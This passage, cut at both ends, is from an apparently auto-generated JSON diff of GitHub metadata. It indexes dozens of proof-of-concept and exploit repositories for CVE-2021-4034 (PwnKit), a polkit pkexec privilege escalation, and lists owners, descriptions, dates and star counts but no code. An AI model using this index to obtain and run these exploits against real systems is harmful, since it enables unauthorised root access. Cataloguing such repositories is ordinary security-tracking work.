0, + "subscribers_count": 15 + }, + { + "id": 452096662, + "name": "CVE-2021-4034", + "full_name": "JohnHammond\/CVE-2021-4034", + "owner": { + "login": "JohnHammond", + "id": 6288722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4", + "html_url": "https:\/\/github.com\/JohnHammond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2021-4034", + "description": "Bash implementation of CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T01:05:55Z", + "updated_at": "2023-07-19T23:44:26Z", + "pushed_at": "2022-01-26T01:05:56Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 16, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 452097341, + "name": "CVE-2021-4034", + "full_name": "Audiobahn\/CVE-2021-4034", + "owner": { + "login": "Audiobahn", + "id": 98435709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98435709?v=4", + "html_url": "https:\/\/github.com\/Audiobahn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Audiobahn\/CVE-2021-4034", + "description": "CVE-2021-4034 🎧", + "fork": false, + "created_at": "2022-01-26T01:09:32Z", + "updated_at": "2022-02-12T23:29:17Z", + "pushed_at": "2022-01-26T01:34:11Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452102671, + "name": "poc-cve-2021-4034", + "full_name": "dzonerzy\/poc-cve-2021-4034", + "owner": { + "login": "dzonerzy", + "id": 16840842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16840842?v=4", + "html_url": "https:\/\/github.com\/dzonerzy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dzonerzy\/poc-cve-2021-4034", + "description": "PoC for CVE-2021-4034 dubbed pwnkit", + "fork": false, + "created_at": "2022-01-26T01:34:44Z", + "updated_at": "2024-11-16T19:48:25Z", + "pushed_at": "2022-01-27T15:13:51Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 113, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 452108706, + "name": "CVE-2021-4034", + "full_name": "nikaiw\/CVE-2021-4034", + "owner": { + "login": "nikaiw", + "id": 1255732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1255732?v=4", + "html_url": "https:\/\/github.com\/nikaiw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikaiw\/CVE-2021-4034", + "description": "PoC for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T02:02:25Z", + "updated_at": "2024-08-24T23:44:02Z", + "pushed_at": "2022-01-26T02:27:53Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 62, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452126288, + "name": "CVE-2021-4034", + "full_name": "mebeim\/CVE-2021-4034", + "owner": { + "login": "mebeim", + "id": 14198070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14198070?v=4", + "html_url": "https:\/\/github.com\/mebeim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mebeim\/CVE-2021-4034", + "description": "CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept", + "fork": false, + "created_at": "2022-01-26T03:20:18Z", + "updated_at": "2024-11-24T15:54:40Z", + "pushed_at": "2022-01-26T16:22:46Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "lpe", + "pkexec", + "polkit", + "proof-of-concept", + "pwnkit" + ], + "visibility": "public", + "forks": 6, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452129115, + "name": "CVE-2021-4034", + "full_name": "Ayrx\/CVE-2021-4034", + "owner": { + "login": "Ayrx", + "id": 1937160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1937160?v=4", + "html_url": "https:\/\/github.com\/Ayrx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ayrx\/CVE-2021-4034", + "description": "Exploit for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T03:33:47Z", + "updated_at": "2024-11-22T23:12:21Z", + "pushed_at": "2022-01-27T11:57:05Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 93, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 452135667, + "name": "CVE-2021-4034", + "full_name": "Y3A\/CVE-2021-4034", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T04:05:50Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2023-07-20T08:59:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452145787, + "name": "CVE-2021-4034", + "full_name": "An00bRektn\/CVE-2021-4034", + "owner": { + "login": "An00bRektn", + "id": 58986498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58986498?v=4", + "html_url": "https:\/\/github.com\/An00bRektn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/An00bRektn\/CVE-2021-4034", + "description": "A Golang implementation of clubby789's implementation of CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T04:58:16Z", + "updated_at": "2023-12-21T21:02:17Z", + "pushed_at": "2022-01-27T16:12:20Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "golang" + ], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452154672, + "name": "CVE-2021-4034", + "full_name": "ayypril\/CVE-2021-4034", + "owner": { + "login": "ayypril", + "id": 84289343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84289343?v=4", + "html_url": "https:\/\/github.com\/ayypril", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayypril\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T05:42:40Z", + "updated_at": "2023-08-02T02:44:40Z", + "pushed_at": "2022-01-26T05:42:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452155127, + "name": "CVE-2021-4034", + "full_name": "wongwaituck\/CVE-2021-4034", + "owner": { + "login": "wongwaituck", + "id": 2370088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2370088?v=4", + "html_url": "https:\/\/github.com\/wongwaituck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wongwaituck\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T05:44:44Z", + "updated_at": "2022-01-26T07:02:46Z", + "pushed_at": "2022-01-26T05:46:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452158720, + "name": "my-cve-2021-4034-poc", + "full_name": "0x05a\/my-cve-2021-4034-poc", + "owner": { + "login": "0x05a", + "id": 45216786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45216786?v=4", + "html_url": "https:\/\/github.com\/0x05a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x05a\/my-cve-2021-4034-poc", + "description": "my PoC", + "fork": false, + "created_at": "2022-01-26T06:00:49Z", + "updated_at": "2022-01-26T06:05:24Z", + "pushed_at": "2022-01-26T06:05:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452159556, + "name": "cve-2021-4034-playground", + "full_name": "silocityit\/cve-2021-4034-playground", + "owner": { + "login": "silocityit", + "id": 93676455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93676455?v=4", + "html_url": "https:\/\/github.com\/silocityit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silocityit\/cve-2021-4034-playground", + "description": "impromptu pwn chal", + "fork": false, + "created_at": "2022-01-26T06:04:39Z", + "updated_at": "2022-01-25T23:40:34Z", + "pushed_at": "2022-01-25T23:39:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 452177217, + "name": "CVE-2021-4034", + "full_name": "zhzyker\/CVE-2021-4034", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2021-4034", + "description": "polkit pkexec Local Privilege Vulnerability to Add custom commands", + "fork": false, + "created_at": "2022-01-26T07:19:21Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2022-01-27T06:23:02Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452189818, + "name": "CVE-2021-4034-new", + "full_name": "J0hnbX\/CVE-2021-4034-new", + "owner": { + "login": "J0hnbX", + "id": 98451016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98451016?v=4", + "html_url": "https:\/\/github.com\/J0hnbX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J0hnbX\/CVE-2021-4034-new", + "description": null, + "fork": false, + "created_at": "2022-01-26T08:05:54Z", + "updated_at": "2022-01-26T08:06:07Z", + "pushed_at": "2022-01-26T08:06:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452195404, + "name": "CVE-2021-4034", + "full_name": "Immersive-Labs-Sec\/CVE-2021-4034", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-4034", + "description": "Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation", + "fork": false, + "created_at": "2022-01-26T08:25:41Z", + "updated_at": "2023-09-27T16:39:46Z", + "pushed_at": "2022-01-26T09:37:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 452200465, + "name": "pkwner", + "full_name": "kimusan\/pkwner", + "owner": { + "login": "kimusan", + "id": 1150049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1150049?v=4", + "html_url": "https:\/\/github.com\/kimusan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimusan\/pkwner", + "description": "A python3 and bash PoC for CVE-2021-4034 by Kim Schulz", + "fork": false, + "created_at": "2022-01-26T08:43:15Z", + "updated_at": "2024-10-12T21:48:38Z", + "pushed_at": "2022-01-27T10:40:14Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "pwn", + "python", + "python3" + ], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452219784, + "name": "CVE-2021-4034", + "full_name": "N1et\/CVE-2021-4034", + "owner": { + "login": "N1et", + "id": 34748334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34748334?v=4", + "html_url": "https:\/\/github.com\/N1et", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1et\/CVE-2021-4034", + "description": "Just a sh script file to CVE-2021-4034 ", + "fork": false, + "created_at": "2022-01-26T09:46:35Z", + "updated_at": "2022-01-26T10:06:20Z", + "pushed_at": "2022-01-26T10:08:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452230505, + "name": "CVE-2021-4034", + "full_name": "Nero22k\/CVE-2021-4034", + "owner": { + "login": "Nero22k", + "id": 64486541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486541?v=4", + "html_url": "https:\/\/github.com\/Nero22k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nero22k\/CVE-2021-4034", + "description": "Dirty PoC for CVE-2021-4034 (Pwnkit)", + "fork": false, + "created_at": "2022-01-26T10:22:43Z", + "updated_at": "2022-01-26T10:24:58Z", + "pushed_at": "2022-01-26T14:32:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452234457, + "name": "CVE-2021-4034", + "full_name": "LukeGix\/CVE-2021-4034", + "owner": { + "login": "LukeGix", + "id": 80392368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80392368?v=4", + "html_url": "https:\/\/github.com\/LukeGix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LukeGix\/CVE-2021-4034", + "description": "A stupid poc for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T10:36:35Z", + "updated_at": "2022-01-26T12:49:03Z", + "pushed_at": "2022-01-26T12:28:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452235222, + "name": "CVE-2021-4034-POC", + "full_name": "aus-mate\/CVE-2021-4034-POC", + "owner": { + "login": "aus-mate", + "id": 50848630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50848630?v=4", + "html_url": "https:\/\/github.com\/aus-mate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aus-mate\/CVE-2021-4034-POC", + "description": null, + "fork": false, + "created_at": "2022-01-26T10:39:27Z", + "updated_at": "2022-01-26T10:56:06Z", + "pushed_at": "2022-01-26T10:57:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452240756, + "name": "CVE-2021-4034", + "full_name": "chenaotian\/CVE-2021-4034", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-4034", + "description": "CVE-2021-4034 POC and Docker and Analysis write up", + "fork": false, + "created_at": "2022-01-26T10:58:23Z", + "updated_at": "2024-11-18T17:52:27Z", + "pushed_at": "2022-05-23T02:03:43Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452241951, + "name": "CVE-2021-4034", + "full_name": "moldabekov\/CVE-2021-4034", + "owner": { + "login": "moldabekov", + "id": 669547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/669547?v=4", + "html_url": "https:\/\/github.com\/moldabekov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moldabekov\/CVE-2021-4034", + "description": "Pseudopatch for CVE-2021-4034", + "fork": false, + "created_at": "2022-01-26T11:02:29Z", + "updated_at": "2022-01-26T11:20:30Z", + "pushed_at": "2022-01-26T11:17:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452271601, + "name": "-CVE-2021-4034", + "full_name": "jostmart\/-CVE-2021-4034", + "owner": { + "login": "jostmart", + "id": 402127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/402127?v=4", + "html_url": "https:\/\/github.com\/jostmart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jostmart\/-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T12:44:22Z", + "updated_at": "2022-01-26T12:44:22Z", + "pushed_at": "2022-01-26T13:00:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452288004, + "name": "pwnkit", + "full_name": "c3l3si4n\/pwnkit", + "owner": { + "login": "c3l3si4n", + "id": 39219175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39219175?v=4", + "html_url": "https:\/\/github.com\/c3l3si4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3l3si4n\/pwnkit", + "description": "PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120.", + "fork": false, + "created_at": "2022-01-26T13:34:01Z", + "updated_at": "2024-11-08T07:05:26Z", + "pushed_at": "2022-01-26T20:17:11Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452291757, + "name": "CVE-2021-4034", + "full_name": "n3rdh4x0r\/CVE-2021-4034", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T13:45:17Z", + "updated_at": "2022-01-26T13:47:01Z", + "pushed_at": "2022-01-26T13:50:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452306200, + "name": "PwnKit", + "full_name": "ly4k\/PwnKit", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/PwnKit", + "description": "Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation", + "fork": false, + "created_at": "2022-01-26T14:26:10Z", + "updated_at": "2024-11-26T21:46:55Z", + "pushed_at": "2022-06-21T14:52:05Z", + "stargazers_count": 1089, + "watchers_count": 1089, + "has_discussions": false, + "forks_count": 189, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034" + ], + "visibility": "public", + "forks": 189, + "watchers": 1089, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 452311547, + "name": "CVE-2021-4034-POC", + "full_name": "san3ncrypt3d\/CVE-2021-4034-POC", + "owner": { + "login": "san3ncrypt3d", + "id": 32395477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32395477?v=4", + "html_url": "https:\/\/github.com\/san3ncrypt3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/san3ncrypt3d\/CVE-2021-4034-POC", + "description": null, + "fork": false, + "created_at": "2022-01-26T14:40:27Z", + "updated_at": "2022-01-26T14:41:01Z", + "pushed_at": "2022-01-26T14:43:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452318593, + "name": "CVE-2021-4034", + "full_name": "fdellwing\/CVE-2021-4034", + "owner": { + "login": "fdellwing", + "id": 22813377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22813377?v=4", + "html_url": "https:\/\/github.com\/fdellwing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdellwing\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T14:59:37Z", + "updated_at": "2022-01-26T15:06:30Z", + "pushed_at": "2022-01-26T15:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452321441, + "name": "CVE-2021-4034-UniontechOS", + "full_name": "xcanwin\/CVE-2021-4034-UniontechOS", + "owner": { + "login": "xcanwin", + "id": 14187349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4", + "html_url": "https:\/\/github.com\/xcanwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xcanwin\/CVE-2021-4034-UniontechOS", + "description": "统信UOS 桌面操作系统,存在CVE-2021-4034漏洞(Linux Polkit本地权限提升漏洞)。", + "fork": false, + "created_at": "2022-01-26T15:07:07Z", + "updated_at": "2023-04-03T08:43:06Z", + "pushed_at": "2022-05-27T18:41:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "polkit", + "uniontechos", + "uos" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452339779, + "name": "CVE-2021-4034", + "full_name": "azminawwar\/CVE-2021-4034", + "owner": { + "login": "azminawwar", + "id": 9054660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9054660?v=4", + "html_url": "https:\/\/github.com\/azminawwar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azminawwar\/CVE-2021-4034", + "description": "CVE-2021-4034 in Bash Script", + "fork": false, + "created_at": "2022-01-26T15:56:15Z", + "updated_at": "2022-03-23T23:09:12Z", + "pushed_at": "2022-01-26T16:09:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452343009, + "name": "pwnkit-exploit", + "full_name": "PeterGottesman\/pwnkit-exploit", + "owner": { + "login": "PeterGottesman", + "id": 9545411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9545411?v=4", + "html_url": "https:\/\/github.com\/PeterGottesman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterGottesman\/pwnkit-exploit", + "description": "CVE-2021-4034 POC exploit", + "fork": false, + "created_at": "2022-01-26T16:04:37Z", + "updated_at": "2023-08-04T21:24:15Z", + "pushed_at": "2022-01-28T00:38:03Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452343489, + "name": "CVE-2021-4034", + "full_name": "sunny0day\/CVE-2021-4034", + "owner": { + "login": "sunny0day", + "id": 47361206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47361206?v=4", + "html_url": "https:\/\/github.com\/sunny0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunny0day\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T16:05:47Z", + "updated_at": "2022-01-26T16:06:47Z", + "pushed_at": "2022-01-26T16:08:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452345701, + "name": "cve-2021-4034", + "full_name": "artemis-mike\/cve-2021-4034", + "owner": { + "login": "artemis-mike", + "id": 61116444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61116444?v=4", + "html_url": "https:\/\/github.com\/artemis-mike", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artemis-mike\/cve-2021-4034", + "description": "PoC for cve-2021-4034", + "fork": false, + "created_at": "2022-01-26T16:11:40Z", + "updated_at": "2024-04-27T19:02:22Z", + "pushed_at": "2024-04-27T19:02:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 452348088, + "name": "CVE-2021-4034", + "full_name": "whokilleddb\/CVE-2021-4034", + "owner": { + "login": "whokilleddb", + "id": 56482137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56482137?v=4", + "html_url": "https:\/\/github.com\/whokilleddb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whokilleddb\/CVE-2021-4034", + "description": "An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec", + "fork": false, + "created_at": "2022-01-26T16:18:10Z", + "updated_at": "2022-06-30T06:04:37Z", + "pushed_at": "2022-01-27T19:58:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452357365, + "name": "CVE-2021-4034", + "full_name": "dadvlingd\/CVE-2021-4034", + "owner": { + "login": "dadvlingd", + "id": 61039959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61039959?v=4", + "html_url": "https:\/\/github.com\/dadvlingd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dadvlingd\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-26T16:43:18Z", + "updated_at": "2023-12-24T12:16:37Z", + "pushed_at": "2023-02-19T13:01:42Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452365926, + "name": "cve-2021-4034", + "full_name": "zcrosman\/cve-2021-4034", + "owner": { + "login": "zcrosman", + "id": 21688962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21688962?v=4", + "html_url": 